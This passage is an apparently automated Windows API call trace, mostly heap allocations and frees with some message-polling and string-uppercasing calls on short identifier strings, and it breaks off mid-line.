[0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0199.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.327] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.328] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.329] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.330] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.330] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.330] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.331] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.331] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.332] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.332] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.332] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.332] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.332] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.333] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.333] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.333] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.334] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: 